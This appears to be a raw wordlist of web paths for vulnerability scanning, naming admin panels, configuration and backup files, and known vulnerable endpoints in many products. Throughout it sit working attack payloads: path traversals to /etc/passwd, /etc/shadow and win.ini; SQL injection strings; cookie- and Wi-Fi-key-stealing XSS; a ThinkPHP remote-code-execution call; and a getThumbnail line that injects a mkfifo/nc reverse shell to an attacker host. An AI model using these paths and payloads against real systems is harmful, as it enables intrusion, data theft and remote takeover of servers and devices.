/api/v1/App/user
/goform/formSysCmd 
/goform/formWlAc
/service/rapture/session
/service/rest/beta/repositories/go/group
/#admin/system/api
/deviceconfig/setActivationCode
/api/system/deviceinfo
/delivery.sh
/goform/mp
/list/backup
/schedule/backup
/system_usermanager.php?act=new
/api/proxy
/boaform/admin/formPing
/_s_/dyn/Script_view?script=/config/productkey.txt
/pingview.cmd
/admin_lua_script.html
/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
/userRpm/BakNRestoreRpm.htm
/incoming/RouterBakCfgUpload.cfg
/pingview.cmd
/config_backup.bin
/settings/system
/integrations.json
/users/user_prefs.json
/app/kibana
/?page=networksettings
/zdm/ios/mdm
/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/config?logpathConf.html
/config
/api/settings/log?file=
/accounts/password-reset/
/./../../../../../../../../../../etc/shadow
/.%0d./.%0d./.%0d./.%0d./bin/sh
/SMARThome1.swf
/dummypost/xerox.set
/outputSetup.htm
/homeautomation
/xml/authClients.xml
/userconfig.htm
/Config/config.html
/Config/service/saveData
/login/Auth
/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
/en/conf_admin.html
/links/Nova_Config_2019-01-07.bck
/tools/ajax/ConsoleResult.html?get
/?c=webuser&m=insert
/?c=webuser&m=update
/cbas/scripts/upgrade/restore_sql_db.sh
/bin/sysfcgi.fx
/?c=webuser&m=update
/?c=webuser&m=select&p=&f=&w=&v=1
/goform/SysToolChangePwd
/admin/widgets
/admin/api/widgets
/api/login/admin
/xyz/../../ThinVnc.ini
/view/login/normal
/api/core/auth
/wb_network_changed.htm
/panel/members/
/anchor/errors.log
/Register
/DotNetNuke
/API/PersonaBar/Users/UpdateSuperUserStatus?userId=
/API/PersonaBar/Users/CreateUser
/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
/assets/js/framework.js
/backend/backend/auth/signin
/backend/cms/media/
/storage/app/media/
/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
/wlsecrefresh.wl
/app/ux/index.html
/jobs/jobs-in/
/?page=gourlfile&id=1 
/exports/launchExport/0.json
/login/login
/login/logout
/users/add
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/api/json/v2/device/listDevices
/api/json/workflow/addWorkflow
/api/json/workflow/getWorkflowList
/api/json/workflow/showDevicesForWorkflow
/api/json/workflow/executeWorkflow
/api/json/workflow/deleteWorkflow
/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms://
/WebPanel
/wan.htm
/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/adive/admin/config
/joomsport_season/new-yorkers/?action=playerlist
/logs/
/obs/obm7/file/upload
/obs/obm7/user/getUserProfile
/obs/obm7/user/isTrialEnabled
/obs/obm7/user/addTrialUser
/obs/obm8/user/setUserProfile
/branch/store
/edit-listing/
/submit-listing/
/ver10/network/wsdl
/security/cfgSecurityAAAUsersCreate
/package-updates
/rootDesc.xml
/currentsetting.htm
/EBS_ASSET_HISTORY_OPERATIONS
/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27
/ara.html?ara=
/firmalar.html?il=0&kat=&kelime=&siralama=yeni
/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
/_s_/dyn/Script_view?script=
/users/saveModifications
/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
/ProtectManager/enforce/admin/senderrecipientpatterns/list 
/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
/worksuite24/public/login
/ciuiscrm-16/calendar/addevent
/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
/api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test
/api/filemanager
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
/v1/agent/service/register
/v1/agent/services
/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style
/Script/admin?id=&description=
/Script/search/songs/general?username=4929700&password=2802530
/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999
/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id= 
/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=
/config/pw_snmp.html
/config/pw_changeusers.html
/trean/
/graphql
/data/other/authorization.xml
/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999
/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999
/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=
/PasswordVault/auth/saml/
/EmployeeSearch.cc?actionId=Search
/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 
/EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search
/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
/async/AsyncResponseService
/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
/admin/overview?qcustompivot="><script>prompt(‘XSS’)</script>
/delivery/public/vehicles/create   
/good/vehicles
/_async/AsyncResponseServiceHttps
/helpdeskz/?v=submit_ticket&action=displayForm
/admin/member/edit.html
/?mobile=1&mp_idx=%22;$.getScript(%27//127.0.0.1/z%27);//
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
/CMD_FTP
/CMD_SHOW_USER
/CMD_CRON_JOBS
/CMD_SHOW_RESELLER
/CMD_ACCOUNT_ADMIN
/CMD_ADMIN_FILE_EDITOR
/CMD_FILE_MANAGER/XSS-PAYLOAD
/userRpm/DiagnosticRpm.htm
/userRpm/LoginRpm.htm
/backend/dashboard/home/monthly_deposit
/mc
/jobgator/
/myFiles/images/
/welcome/monthly_expense_overview
/search/searchdetailed
/search/rentals
/agents/agentlistdetails
/meta
/studio/index.html
/database/testdb/plocal/graph
/database/testdb
/command/demodb/sql/-/20?format=rid,type,version,class,graph
/command/demodb/sql/-/20?format=rid,type,version,class,graph
/document/demodb/-1:-1
/CMD_ACCOUNT_ADMIN
/device.html
/boaform/formPasswordSetup
/bolt/editcontent/pages
/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product
/configuration.xml
/query
/admin/users/update
/_utils/
/korugan/dhcp
/korugan/time
/korugan/snat
/korugan/login
/korugan/vpnfw
/korugan/admins
/korugan/routing
/korugan/dnsmasq
/korugan/cmclient
/korugan/fwgroups
/korugan/schedule
/korugan/policyfw
/home/purchase.php
/manage/qos/rules/
/korugan/vpn_users
/korugan/netwizard2
/korugan/smtpconfig
/manage/qos/devices/
/korugan/proxyconfig
/korugan/antispyware
/korugan/openvpn_users
/korugan/admin_profiles
/korugan/backupschedule
/korugan/policy_routing
/app/Config/database.php
/korugan/https_exceptions
/korugan/openvpn_advanced
/korugan/license_activation
/korugan/hotspot_permanent_users
/?Key=PhoneRequestAuthorization
/view/all/newJob
/view/all/createItem
/job/cmd/configSubmit
/job/cmd/build?delay=0sec
/j_acegi_security_check
/openmrs/ws/rest/v1/
/policies
/order.html
/runJob.html
/en-US/manager/appinstall/_upload
/uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123
/cruises/cruises
/j-myhotel/search-hotels?view=hotels
/?p=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%5$
/impress/modules/system/admin.php?bid=1
/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=
/rom-0
/goform/SystemCommand
/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27
/upload/data/imgdb.db
/_api/contextinfo
/_api/web/lists?$filter=true
/metaweblog.axd
/upload_config/
/api/sms/send-sms
/charge/admin
/api/agent/service.html
/docs/agent/options.html
/docs/commands/exec.html
/admin/new-content
/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#
/admin/?do=regstatus&action=deny&id=2
/preview/page
/?BaZar&vue=exporter&id=
/res/api/v1/ruleapps
/rest/bpm/monitor/events
/admin/index.php?controller=pjAdminUsers&action=pjActionUpdate
/ssc/api/v1/bulk
/ctrlt/DeviceUpgrade_1
/webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f
/config/deviceinformation/config.xml
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/ecommerce/control/AddForumThread?forumId=ASK
/cps
/admin-dev/
/using-userfaultfd.html
/superset/import_dashboards
/Security/Security.shtm
/plcExchange/getValues/
/usr/Syslog/FwLog.txt
/helpdezk/manageattachments/
/public/admin/user/submitnew
/updatesettings.html
/zhnvlanadd.html
/1.0/users/authentication/rest/signin
/api/dashboard/v1/files/writeFile 
/api/dashboard/v6/waConfig/getWebAccessProjectList
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/
/.photon/pwm/pwm.menu
/.photon/voyager/config.full
/.photon/voyager/history.html
/.photon/voyager/hotlist
/0/config/set
/AdminTools/querybuilder/ie.jsp
/AdminTools/querybuilder/logonform.jsp
/AnalyticalReporting/querywizard/jsp/apply.jsp
/AnalyticalReporting/querywizard/jsp/query.jsp
/AnalyticalReporting/querywizard/jsp/turnto.jsp
/Asoquu3e.html
/BoundlessTunes.swf       
/CFIDE/adminapi/administrator.cfc
/CFIDE/administrator/enter.cfm
/CFIDE/administrator/scheduler/scheduleedit.cfm
/CFIDE/administrator/scheduler/scheduletasks.cfm
/CFIDE/main/ide.cfm
/CON
/CONF&LOG=/etc/passwd&NOIH=no&FRAMES=y
/CPUCommands
/CommentAPI/
/CrystalReports/jsp/CrystalReport_View/viewReport.jsp
/DB4Web/
/DocumentViewer/Control/
/ESAdmin/collection.do
/Example.swf
/Example_controller.swf
/ForensicsAnalysisServlet/
/Forms/login1
/Guide/
/HNAP1/
/HPSSA/index.htm
/IPn4G.config 
/IdproveWebclient/Account/Login  
/InfoViewApp/jsp/common/actionNavFrame.jsp
/LoadImage.swf 
/LoadMP4.swf  
/Local/console/cmhome.htm
/MyStruts.action
/OA_HTML
/OA_HTML/OA.jsp
/OA_HTML/RF.jsp
/OBCR&OC
/OvCgi/OpenView5.exe
/PerformanceManagement/jsp/aa-display-flash.jsp
/PerformanceManagement/jsp/alertcontrol.jsp
/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp
/PerformanceManagement/jsp/sb/roleframe.jsp
/PerformanceManagement/jsp/viewError.jsp
/PerformanceManagement/jsp/viewWebiReportHeader.jsp
/PerformanceManagement/jsp/wait-frameset.jsp
/PerformanceManagement/scripts/docLoadUrl.jsp
/PermaLink.aspx
/PlatformServices/preferences.do
/Portal/Portal.mwsl
/RealFolder
/SOAPWrapperCommon_UsersWS_GetServers_Wrapper
/STATE_ID/31337/jsp/xmlhttp/persistence.jsp
/Secure/Local/console/install_upload_action/crl_format
/SetupReceipt.html
/SomeAction.action
/TopAccess/Administrator/Setup/ScanToFile/List.htm
/WEB-INF/
/WebServiceImpl/axis2-admin/upload    
/account/index.jsp
/action=chooseDirectory&currentPath
/admin-serv/tasks/configuration/ViewLog
/admin/
/admin/api-cms-nav/create-page 
/admin/auth.adduser.html
/admin/includes/
/admin/index.jsp
/admin/management.shtml
/admin/media/upload 
/admin/queueBrowse/example.A
/admin/queues.jsp
/admin/topics.jsp
/admin/user_management/ajax_list_info
/ads-readerext/ads-readerext
/alfresco/cmisbrowser
/alfresco/proxy
/altercast/AlterCast
/amserver/UI/Login
/anything.jsp
/api
/api/hosts     
/api/settings/setting-isauthenticationenabled
/api/storage  
/api/systems/details      
/app/index.html
/application/j_security_check
/applications/applications.jsf
/applications/lifecycleModulesNew.jsf
/auditor/
/auth.w
/auth.xsl
/axis/tt_pm4l.jws
/axis2/axis2-admin/engagingglobally
/backend/ajax
/base-dir/access/stafffile
/bin/test.txt
/bindings.yaws
/carbo.dll
/cd/../config/html/cnf_gi.htm
/cfdocs/expeval/ExprCalc.cfm
/cgi-bin/ExportSettings.sh
/cgi-bin/ServerView/
/cgi-bin/admin/upgrade.cgi
/cgi-bin/cvename.cgi
/cgi-bin/db2www/
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/db4web_c/dbdirname/etc/hosts
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/loadpage.cgi
/cgi-bin/main-cgi
/cgi-bin/mj_wwwusr
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report
/cgi-bin/php/lang_change.php
/cgi-bin/rwcgi60
/cgi-bin/rwcgi60/showenv
/cgi-bin/script.cgi
/cgi-bin/suche/hsx.cgi
/cgi-bin/system.conf
/cgi-bin/w3-msql/protected-directory/.htpasswd
/cgi-bin/w3-msql/protected-directory/private-file
/cgi-bin/webif/download.sh
/cgi-bin/webif/status-processes.sh
/cgi-bin/webif/system-acl.sh
/cgi-bin/webif/system-crontabs.sh
/cgi-bin/webif/system-services.sh
/cgi-bin/webif/system-startup.sh
/cgi-bin/webwho.pl
/cgi-bin/whois_raw.cgi
/cgi-bin/wrap
/cgi-bin/writeVal.exe  
/cgi/bin/test.txt
/cgi/conf.bin
/chat/
/chat/!nicks.txt
/chat/!pwds.txt
/chat/data/usr
/circarlife/                                        
/cmsms/admin
/config.php
/config.w
/config/html/cnf_gi.htm
/configuration.yaws
/configuration/auditModuleEdit.jsf
/configuration/configuration.jsf
/configuration/edit-list.html 
/configuration/httpListenerEdit.jsf
/connectedNodes.ovpl
/console/portal/
/console/portal/Server/Monitoring
/console/portal/Server/Shutdown
/consolehelp/console-help.portal
/cookiez.php
/csvn/login
/ctx/index
/current_config/Account1
/current_config/passwd
/customMBeans/customMBeans.jsf
/dashboard/withdrawal
/dav_portal
/dav_public
/ddns.htm                                                                              
/debug/dbg
/debug/echo
/debug/errorInfo
/debug/showproc
/decoding/index.php
/demantra/common/loginCheck.jsp/../../GraphServlet
/demo-servlets/%2fWEB-INF/config/mishka.properties
/demo-servlets/WEB-INF/config/mishka.properties
/demo-servlets/snoop.jsp
/dm/demarc
/dms0
/dmsoc4j/AggreSpy
/docs/bind9dns.html
/doku.php
/dvrcontrol.cgi
/dwellTrafficMapImage.jpg
/echo2
/ejs/
/em/dynamicImage/emSDK/chart/EmChartBean
/en-GB/account/login
/en-US/splunkd/__raw/services/server/info/server-info
/en/admin 
/error
/error_box.html
/etc/loginerror.html
/etc/passwd
/example.com/wa/auth
/example/
/exampleext/control/main
/examples/jsp/num/numguess.js
/examples/jsp/snp/anything.snp
/examples/jsp/source.jsp
/examples/servlets/servlet/CookieExample
/examples/snp/snoop.jsp
/exec/authenticate
/exec/show/config/cr
/exportFile
/ezinfo/about     
/faces/javax.faces.resource/web.xml
/file.asp
/flash/addcrypted2
/flv8/player.php
/flv8/popup.php
/fly2.pn
/forms90/f90servlet
/frontend/x3/stats/lastvisit.html
/getsource.jsp
/goform/SysToolReboot
/goform/WizardHandle
/gsdl/cgi-bin/library.cgi
/gsdl/etc/error.txt
/gsdl/etc/key.db
/gsdl/etc/users.db
/gui/
/gui/index.html
/heightTrafficMapImage.jpg
/help/
/help/advanced/searchView.jsp
/help/advanced/workingSetManager.jsp
/help/readme.nsf/Header
/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm
/home/login
/homebet/homebet.dll
/host-manager/html/add
/hrm/user/update-user-avatar
/html/device-id                                     
/html/log                                           
/html/repository                                    
/httpDisabled.shtml
/ibm/console/
/idm/login.jsp
/idm/questionLogin.jsp
/ifx/
/iissamples/exair/howitworks/codebrws.asp
/image_importer.php
/image_uploads/webshell.php
/imc/login.jsf
/incl/image_test.shtml
/includes/global.inc
/index.exp
/index.htm
/index.jsp
/index.php
/index.php/frontend/myprofile/en
/index.php/user/log_activity
/index.php3
/index.shtml
/index.wkf
/info.php
/isqlplus
/j_security_check
/jde/E1Menu.maf
/jde/E1Menu_Menu.mafService
/jde/E1Menu_OCL.mafService
/jde/JASMafletMafBrowserClose.mafService
/jde/MafletClose.mafService
/jhttpd/
/jira/secure/attachment/
/job-portal/
/jpg/image.jpg
/jsp-examples/cal/cal2.jsp
/jsptest.jsp
/leaves/validate  
/leftimage.jpg
/level/
/level/$n/exec/
/level/$n/exec/show%20conf
/login.html
/login.jsp
/login.php
/lua/network_load.lua
/mail/feed/atom
/mail/x.nsf/CalendarFS
/mail/x.nsf/ToDoFS
/mail/x.nsf/WebInteriorCalendarFS
/mail/x.nsf/WebInteriorToDoFS
/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/
/main/web/config/alarming.schedule
/main/web/config/conf.modules
/mainFrame.htm
/mantisbt/
/menu.env
/middleImage.jpg
/miniwebserver/
/mj_wwwusr
/moab/MOAB-01-01-2007.html
/monitor/m_overview.ink
/msadc/Samples/SELECTOR/showcode.asp
/msg_viewer_user_mail.html
/msgserver/html/group
/myapp/MyCookies
/mywebapp/logout/spring-security-redirect
/nagios/cgi-bin/config.cgi
/nagiosxi/account/
/nagiosxi/admin/users.php
/nagiosxi/includes/components/massacknowledge/mass_ack.php
/nagiosxi/includes/components/xicore/recurringdowntime.php
/nagiosxi/includes/components/xicore/status.php
/nagiosxi/login.php
/nagiosxi/reports/alertheatmap.php
/nagiosxi/reports/histogram.php
/nagiosxi/reports/myreports.php
/nagiosxi/reports/notifications.php
/nagiosxi/reports/statehistory.php
/names.nsf
/networkSetup.htm
/opennms/event/query
/opt/omni/lbin/
/opt/splunk
/oradb
/page.jsp
/pages/connectionStatus/connectionStatus-hostEntry
/pages/viewpage.action
/payload.dtd
/pbx/gate
/perl-status
/phonebook/contact_list_data
/photo-gallery/api/album/tree_lists/
/photo-gallery/api/photo/search/
/php/admin_update_program.php
/php/wcs_bwlists_handler.php
/phpinfo.php
/pls/
/pls/MSBEP004/
/pls/TEST/oracleconfigure.customize
/pls/[DADName]/icx_define_pages.DispPageDialog
/pls/[DADName]/icx_define_pages.editpagelist
/pls/[DADName]/oracleconfigure.customize
/pls/otn/f
/pls/otn/wwv_flow.accept
/pls/portal/PORTAL.wwv_main.render_warning_screen
/portal/page
/portal_top.html 
/post-a-job/
/prestashop/admin177chuncw/
/professional-b2b-script/
/projects/eumrv/app/
/proxy/0/
/proxy/smhui/getuiinfo
/pservlet.html
/pub/english.cgi
/qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment
/qcenter/hawkeye/v1/account?_dc=1519932315271
/qcenter/hawkeye/v1/date_config
/qcenter/hawkeye/v1/network_config
/qcenter/hawkeye/v1/ssh_setting_config
/qwe/qwe/qwe/index.html
/rc                        
/rc/?_task=settings&_action=plugin.filters-save                                                
/rebinder.html
/recordings/index.php
/recordings/misc/audio.php
/red2301.html
/report/mnAozbpC
/reports/rwservlet
/reports/rwservlet/parsequery
/reports/rwservlet/showenv
/reports_mta_queue_status.html
/research-free-solutions.php.
/resourceNode/customResourceNew.jsf
/resourceNode/externalResourceNew.jsf
/resourceNode/jdbcConnectionPoolNew1.jsf
/resourceNode/jdbcResourceEdit.jsf
/resourceNode/jdbcResourceNew.jsf
/resourceNode/jmsConnectionNew.jsf
/resourceNode/jmsDestinationNew.jsf
/resourceNode/resources.jsf
/rest/v1/AccountService/Account
/restapi/system/ExportConfig
/restapi/system/ExportLogs
/rightimage.jpg
/rodrigo
/rokform/SysDataDetail
/rss/1.0/modules/content/
/safari/safari2.html
/samples/view-source
/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm
/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm
/scgi-bin/platform.cgi
/script.php
/scripts/db4web_c.exe
/scripts/dbman/db.cgi
/scripts/wgate.dll
/scripts/wgate/
/scripts/wgate/pbw2/
/sdn/ui/app/login
/sdn/ui/app/rs/hpws/config
/search
/search/document.do
/search/query/search
/search97.vts
/secure/embedded/builtin
/sendrcpackage?keyid=-2544&keysymbol=-4081
/sentrifugo/index.php/servicedeskconf/getemployees
/server-status
/service/graph_html.php
/services/config/config.xml                         
/services/server/info/server-info
/services/system/info.html                                                
/services/system/setup.json                         
/services/user/values.xml                           
/servlet/Satellite
/servlet/com.livesoftware.jrun.plugins.jsp.JSP
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
/servlet/custMsg
/servlet/file/login.jsp
/servlet/jsp
/servlet/one2planet.infolet.InfoServlet
/servlet/pagecompile._admin._SELogging_xjsp
/servlet/pagecompile._admin._dataSources_xjsp
/servlet/pagecompile._admin._debug_xjsp
/servlet/pagecompile._admin._help._helpContent_xjsp
/servlet/pagecompile._admin._login_xjsp
/servlet/pagecompile._admin._optionalPackages_xjsp
/servlet/pagecompile._admin._userMgt_xjsp
/servlet/pagecompile._admin._virtualServers_xjsp
/servlet/pagecompile._admin._vmSystemProperties_xjsp
/servlet/ssifilter/../../filename
/servlet/sunexamples.RealmDumpServlet
/servlet/traveler
/servlets-examples/servlet/CookieExample
/servlets/gnujsp/[dirname]/[file]
/session/pagecount
/session_login.cgi
/shell/index.cgi
/showfile.asp
/signEzUI/playlist/edit/upload/
/sipssys/users/
/snapshot.jpg
/softnas/applets/update/
/someApp/javax.faces.resource.../WEB-INF/web.xml.jsf
/someApp/javax.faces.resource./WEB-INF/web.xml.jsf
/spos/products/get_products/1
/ssdp/device-desc.xml
/ssh/command_stream
/startStopTrafficMapImage.jpg
/statistics/gscsetup.xml
/status
/status.xsl
/stconf.nsf
/stconf.nsf/WebMessage
/struts-virtdir
/struts2-blank-2.0.11.1/struts..
/struts2-blank/home.action
/struts2-showcase/fileupload/upload.action
/struts2-showcase/modelDriven/modelDriven.action
/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)}
/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}
/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}
/support/docview.wss
/support/kb/doc.php
/support/messages
/survey/api/config              
/sx-users
/sysnet/registration.jsf
/test.dtd
/test.php
/test/jsp/buffer1.jsp
/test/jsp/buffer2.jsp
/test/jsp/buffer3.jsp
/test/jsp/buffer4.jsp
/test/jsp/comments.jsp
/test/jsp/declaration/IntegerOverflow.jsp
/test/jsp/extends1.jsp
/test/jsp/extends2.jsp
/test/jsp/pageAutoFlush.jsp
/test/jsp/pageDouble.jsp
/test/jsp/pageExtends.jsp
/test/jsp/pageImport2.jsp
/test/jsp/pageInfo.jsp
/test/jsp/pageInvalid.jsp
/test/jsp/pageIsErrorPage.jsp
/test/jsp/pageIsThreadSafe.jsp
/test/jsp/pageLanguage.jsp
/test/jsp/pageSession.jsp
/test/realPath.jsp
/tftp/fetch_boot_file
/threeDimage.jpg
/tmp/
/tomcat-docs/appdev/sample/web/hello.jsp
/tools.html
/tools/checksec.sh
/tools_admin.htm
/top.html?page=main&productboardtype= 
/transmission/rpc
/ts_xek.php
/ui/dboard/settings/management//telnetserver
/ui/dboard/settings/proxy//rtsp
/ui/dboard/storage/storageusers
/ui/sb
/unauthenticated/
/upload.html
/users.conf
/usr/bin/id
/util/xmlrpc/Handler.ashx
/utorrent-crash-test.html
/var/lib/sdn/uploads/
/var/www/gitlist/cache
/vdb/
/vdb/bottom.html
/view/viewer_index.shtml
/w.php
/web/login/lib/lang/ 
/web/public 
/webService/webServicesGeneral.jsf
/web_caps/webCapsConfig
/webcacheadmin
/webconsole/faces/faces/faces/jsf/tips.jsp
/webdist.cgi
/webrtc-from-chat/index.html 
/webservice/rest/asset-count
/webservice/rest/asset-inquire
/webservice/rest/asset-list
/webservice/rest/document-count
/webservice/rest/document-inquire
/webservice/rest/document-list
/webservice/rest/object-count
/webservice/rest/object-inquire
/webservice/rest/object-list
/webshell.php
/webtools/control/EntitySQLProcessor
/webtools/control/UpdateGeneric
/webtools/control/scheduleService
/webviewer/gw.dat
/webviewer/netinfo.dat
/wf-NAME/social/api/feed/aggregation/201803310000
/wgate/scripts/ralp/
/widget/inc/widget_package_manager.php
/widget/repository/db/sqlite/tmwf.db
/widget/repository/inc/class/common/crypt/crypt.key
/widget/repository/log/diagnostic.log
/wity/admin/user/edit/1
/wls-wsat/CoordinatorPortType
/wp-config.php
/www/cgi-bin/system.conf
/xampp/phonebook.php
/xampp/showcode.php
/xml/system/setAttribute.xml
/zport/dmd/Devices/devices/manage_doUserCommand
/zport/dmd/ZenUsers/admin
/zport/dmd/userCommands/ping
/{name}_b2b/CatalogClean.do
/{name}_b2b/ForwardDynamic.do
/{name}_b2b/IbaseSearchClean.do
/{name}_b2b/initProductCatalog.do
/~breadbox/software/tiny/teensy.html
/~ksv/
/~m-mat/MT/efaq.html
/~meder
